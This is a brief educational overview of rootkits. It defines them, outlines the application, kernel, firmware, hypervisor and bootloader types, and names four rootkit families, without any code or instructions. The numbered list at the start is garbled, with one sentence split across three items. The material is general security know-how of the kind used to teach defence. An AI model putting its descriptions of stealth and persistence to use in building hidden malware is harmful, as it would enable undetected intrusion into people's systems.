Rootkits

 Rootkits

A rootkit is a collection of software designed to provide privileged access to a remote user over the target system. Mostly, Rootkits are the collection of malicious software deployed after an attack, when the attacker has the administrative access to the target system to maintain its privileged access for future. It creates a backdoor for an attacker; Rootkits often mask the existence of its software which helps to avoid detection.

Types of Rootkits

1.Application Level Rootkits

2.Application Level Rootkits perform manipulation of standard

3.application files, modification of the behavior of the current application with an injection of codes.

Kernel-Level Rootkits

The kernel is the core of an OS. Kernel-Level Rootkits add additional codes (malicious), replace the section of codes of original Operating system kernel.

Hardware / Firmware Level Rootkits

Type of Rootkits that hides in hardware such as hard drive, network interface card, system BIOS, which are not inspected for integrity. These rootkits are built into a chipset for recovering stolen computers, delete data, or render them useless. Additionally, Rootkits has privacy and security concerns of undetectable spying.

Hypervisor Level Rootkits

Hypervisor Level Rootkits exploits hardware features like AMD-V (Hardware-assisted virtualization technologies) or Intel VT, which hosts the target OS as a virtual machine.

Boot Loader Level Rootkits

Bootloader Level Rootkits (Bootkits) replaces the legitimate boot loader with the malicious one which enables the Bootkits to be activated before an OS run. Bootkits are a serious threat to the system security because they can infect startup codes such as Master Boot Record (MBR), Volume Boot Record (VBR) or boot sector. It can be used to attack full disk encryption systems, hack encryption keys and passwords.

Rootkit Tools

Avatar

Necurs

Azazel

ZeroAccess